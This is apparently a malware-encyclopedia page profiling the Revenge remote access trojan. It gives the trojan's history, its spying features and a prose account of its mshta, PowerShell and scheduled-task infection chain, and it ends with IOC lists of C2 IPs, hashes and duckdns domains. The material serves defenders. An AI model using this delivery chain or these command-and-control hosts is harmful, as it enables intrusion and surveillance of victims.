Revenge

Revenge was one of the most popular remote access trojans to be used in 2019 when it was featured in a huge malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy after the victims.

Type
Trojan
Origin
Unknown
First seen
1 January, 2016
Last seen
31 March, 2020
Global rank
30
Week rank
23
Month rank
23
IOCs
978

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans which means that it is usually used by the attackers to control infected PCs remotely or spy on the users by monitoring keystrokes and even computer surroundings through the remote webcam and microphone access.

Discovered for the first time in 2016, Revenge RAT continues to be a threat at the present day with a big spike in popularity monitored in 2019, when the malware was observed targeting corporations and government structures all around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods, robust core feature-set, and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. The popularity of this RAT was further aided by its open-source nature – anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with a nick Napoleon – an Arabic speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that didn’t offer much, if any, code obfuscation and was mainly used by other Arabic speaking cybercriminals. Despite the simplicity of the malware, at the time, only one out of 54 of VirusTotal scanners could pick up the malicious nature of the Revenge code, which confused the researchers bearing in mind the lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release– providing only the most basic functions and definitely losing to competitors in terms of core feature-set. According to Napoleon, this explained why Revenge was available free of charge.

After two months since the initial release, a new version v0.2 was issued by the author, on a more popular hacking forum, this time with more features, but still offered completely free of charge. Since then Revenge has evolved even further and today, it offers cybercriminals a wide range of capabilities including remote files and registry alterations on an infected machine, access to memory, processes and services as well as access to connected devices such as keyboards, webcams and mice, allowing this malware to record the actions of its victims and collect information like banking credentials and social account data.

Core malicious feature-set was not the only thing that evolved over the course of the Revenge lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed in the HTML of a custom blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds.

process graph of the revenge trojan execution Figure 1: Displays the lifecycle of Revenge in a visual form. A graph generated by ANY.RUN

text report of the revenge analysis Figure 2: Shows a customizable text report generated by the ANY.RUN malware analysis service which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

Sometimes the first steps of Revenge trojan execution may vary depending on how it made its way into a victim's computer. The most common form of initial infiltration vector is by the use of Mshta.exe for downloading the payload or for direct execution from a URL. After the payload is delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes - cmd.exe, powershell.exe and schtasks.exe. It starts cmd.exe to kill processes from a list, in the given example processes from Microsoft Office packet were targeted. Powershell.exe is being launched to download the main payload. In turn, schtasks.exe is launched in a way to generate a scheduled task which provides Revenge persistence in the infected system. After all these steps, the malware is ready to complete commands from C2 servers.

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and updated with the latest firmware. One should not disable native Windows security features, regularly update the OS and adhere to the best security practices of staying safe online.

As such, it is advised to stay clear of downloading email attachments from unknown senders and never enabling macros in Microsoft Office if prompted to do so by a file downloaded from a suspicious email.

Distribution of Revenge

Revenge has been seen being distributed in a variety of ways, some of which are potentially more effective than others. For example, Revenge is known to infect PCs from malicious email attachments and corrupted ads on compromised websites.

Most commonly, once delivered in the Microsoft Office file that was downloaded and launched by the potential victim, Revenge will use macros to connect to an outside domain, sometimes hidden on a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can get information about which MITRE ATT&CK™ MATRIX techniques were applied by malware. Just click on the "ATT&CK™ MATRIX " button.

Revenge MITRE ATT&CK MATRIX techniques Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Banking Trojans. It has begun it’s lifespan as a simplistic malware with functionality and without anti-analysis features but has evolved to become a capable and persistent trojan used in massive attacks in Europe, North America, Asia, and the Middle East.

The popularity of this malware is not only due to its robust feature-set, but also ready availability since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a secure cyber defense against Revenge and similar RATs and secure their corporate or government networks by reverse engineering and studying a threat using malware hunting services like to ANY.RUN.

IOCs

IP addresses
192.169.69.25
3.19.3.150
3.17.202.129
83.163.73.56
185.244.30.115
193.161.193.99
193.56.28.101
91.233.116.105
185.140.53.19
193.56.28.134
185.161.210.101
18.223.41.243
39.35.2.46
23.247.102.118
23.247.102.10
185.244.30.181
79.134.225.72
79.134.225.82
141.255.144.24
141.255.155.52
Hashes
e179ee60c8442412c4db904c4da873acd882115f4b869d7cd78bfc1f398260ff
c7bf30d34e0e14112c582d3b55aafabdfb00f563be001f3e1ab4e5d04b5c0271
5e94b03664c3674f3eab1e750ffde61d3d21d938ec0ce21f6f64bc9362aeb084
a610e9aba4d68d770bc552fcdeca31ffdc6ae7c04627ef77879ff8a8c3271314
8880ff5a0c3c9e8a6392478df1bb27654613e8bdf6785f3f05182d24b5bb3235
4092e1587705a676e390c18c58d349bab5ab129649d997b74700ba233ad50871
a0c10485b8e1e40d80bc05c05bdb50fcda212ddeb8ae86792bc5de99863bfd23
f2f5f02a5d900a770aa02f25cc1a1c7a4a93877a39e4f7eb154465708d6f0ed8
f95cd6f7245896ec91dc2dd7605bc340834ec241db1a2bdb101b8d4423ea6b32
8e65cfe68902d0b74ad2bc962d2117e60426298f65da143fb32ded2a247ed6c8
b9675fd741a68e9e3e903d43b2ce03027e05d424a6dbc421355e285ddc901105
4a2d9c83fbaeb0f437b0e5bdbc4bf68d3148eb2fcb591d75b1539fd64977098f
7e6c0e338ffad8656719cc7a3c7bffc9377c76484060973452ec12d6082b903d
ce0ef96819b1a70fb64a7f64b6fed1475d19af8c6220d8ca4b83320be5c957bc
e8af35fe1fab98045d18e7d2e00c71812c9a3c54bc9c8d86f845001bb0e30dcb
05b62361a665d85c4a0f98055233ea3377a7c91c5f7020f6fb56129f66202bb1
c99d475a1d153a4e46829fa4c1cfebeb7ac73c3a5723d873fb5ff80ad32903b2
bc2db003677ece216fd157ed4ccca6a9ede56135e173369cd26ac4f37a5ffcf1
b561479c1ee272a8ba49b39c92b3870072c24053ad5e99b5ae3672e14d93735f
d85497f61b07d8f8cc30c3c66ab21883a0274c7a3e7bc982a3a622ca2eed39a4
Domains
roboticsnetwork.duckdns.org
britianica.uk.com
majul.com
elx01.knas.systems
coodyz.site
meeti.duckdns.org
systemserverrootmapforfiletrn.duckdns.org
santoxpri.duckdns.org
investmenteducationkungykmtsdy8agender.duckdns.org
ikorodu.duckdns.org
d3c00.duckdns.org
kungglobalinvestmenteductgpmstdy8addres.duckdns.org
qq12.duckdns.org
bossmandj.duckdns.org
tescohomegroseryandelectronicstday2store.duckdns.org
chnfrndwsdy1securityandgorvermentsocialf.duckdns.org
shgshg9nationalobjwsdyindustrialgoogler.duckdns.org
msofficewordfiletransfertotheadmintrue.duckdns.org
sweden2020.duckdns.org
donko.duckdns.org

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat and JSocket is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server
Read More
Azorult screenshot
Azorult
azorult trojan rat
AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.
Read More
Crimson RAT screenshot
Crimson RAT
crimson rat trojan
Crimson is a Remote Access Trojan — a malware that is used to take remote control of infected systems and steal data. This particular RAT is known to be used by a Pakistani founded cybergang that targets Indian military objects to steal sensitive information.
Read More
Danabot screenshot
Danabot
danabot trojan stealer
Danabot is an advanced banking Trojan malware that was designed to steal financial information from victims. Out of the Trojans in the wild this is one of the most advanced thanks to the modular design and a complex delivery method.
Read More